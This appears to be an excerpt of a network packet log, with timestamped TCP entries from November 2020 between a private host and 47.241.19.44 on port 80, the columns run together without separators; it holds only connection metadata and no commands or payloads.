                                                                                                                                      Nov 24, 2020 21:20:03.228914022 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228918076 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228943110 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.228959084 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.228991032 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.229039907 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.445724964 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445785046 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445826054 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445866108 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445905924 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445954084 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.445981979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.445997953 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446012974 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446018934 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446022987 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446038008 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446054935 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446078062 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446116924 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446137905 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446146965 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446156979 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446190119 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446197987 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446223021 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446237087 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446258068 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446285963 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446295023 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446329117 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446342945 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446367025 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446382046 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446407080 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446439981 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446466923 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446480989 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446505070 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446521997 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446540117 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.446564913 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.446604013 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582489967 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582540989 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582581997 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582618952 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582667112 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582698107 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582710981 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582730055 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582750082 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582752943 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582787991 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582791090 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582807064 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582832098 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582868099 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582875013 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582907915 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.582921982 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.582958937 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.583004951 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622404099 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622456074 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622497082 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622608900 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622638941 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622643948 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622684002 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622724056 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622747898 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622765064 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622795105 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.622805119 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.622869968 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.702338934 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.702709913 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.799209118 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799268007 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799299002 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799328089 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799371004 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799411058 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799448013 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799485922 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799526930 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799576044 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799578905 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.799623013 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.799655914 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.799729109 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.838664055 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838721991 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838752985 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838781118 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838820934 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838860035 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838901997 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838942051 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838951111 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.838980913 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.838983059 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.838987112 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.838992119 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.839916945 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:03.878607988 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:03.879178047 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015002966 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015062094 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015100002 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015136957 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015187025 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015208006 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015234947 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015240908 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015275002 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015279055 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015319109 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015337944 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015360117 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015398026 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015403032 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015438080 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.015481949 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.015532970 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.055526972 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.057821989 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.094841957 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.094919920 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.094949961 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.094979048 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095009089 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095057011 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095099926 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095132113 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.095136881 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095163107 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.095168114 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.095176935 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095213890 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.095233917 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.095276117 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.231435061 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231494904 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231523037 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231554031 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231583118 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231623888 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231664896 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231700897 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231739998 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231776953 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231786966 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.231825113 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231834888 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.231867075 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.231898069 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.231956005 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271276951 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271684885 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271728039 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271764994 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271804094 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271842957 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271878958 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271887064 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271915913 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271918058 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.271920919 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271925926 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271929979 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271934032 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.271956921 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.272017002 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.313723087 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.313885927 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.316159964 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.316303968 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.350954056 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.353934050 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447323084 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447377920 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447417021 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447454929 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447493076 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447550058 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447593927 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447594881 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447630882 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447633028 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447640896 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447648048 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447674036 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447700977 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447726965 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447765112 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447789907 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447807074 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.447825909 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.447865963 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.487664938 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488328934 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488374949 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488414049 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488456011 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488492966 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.488497972 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488523960 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.488529921 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.488537073 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.488550901 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.488763094 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.490407944 CET4975180192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.595921040 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:04.746153116 CET804975147.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:04.901354074 CET804975047.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:05.392426014 CET804975047.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:05.392524004 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:05.397114038 CET4975080192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:05.658798933 CET804975047.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:06.224319935 CET4975280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:06.224673986 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:06.485444069 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:06.485707998 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:06.486884117 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:06.501492023 CET804975247.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:06.501643896 CET4975280192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:06.790414095 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513534069 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513590097 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513618946 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513648987 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513689041 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513729095 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.513940096 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.514010906 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.552978039 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.553035021 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.553064108 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.553095102 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.553221941 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.558060884 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.774704933 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774761915 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774792910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774822950 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774852037 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774893045 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774930954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.774972916 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.775012016 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.775048971 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.775052071 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.775088072 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.775129080 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.775146008 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.775197983 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.775270939 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.813879013 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.813934088 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.813978910 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.814017057 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.814121962 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.814183950 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.818710089 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.818753958 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.818783045 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.818803072 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:07.818913937 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:07.818965912 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.035861015 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.035943031 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.035990000 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036030054 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036068916 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036117077 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036159992 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036197901 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036236048 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036273003 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036309958 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036348104 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036385059 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036432028 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036473989 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036510944 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036549091 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036587954 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036623001 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036655903 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.036966085 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117624044 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117679119 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117708921 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117738008 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117768049 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117806911 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117846012 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117885113 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117889881 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117923975 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117940903 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117948055 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.117964983 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.117966890 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.118000984 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.118009090 CET804975347.241.19.44192.168.2.3
                                                                                                                                      Nov 24, 2020 21:20:08.118024111 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.118084908 CET4975380192.168.2.347.241.19.44
                                                                                                                                      Nov 24, 2020 21:20:08.157073021 CET804975347.241.19.44192.168.2.3
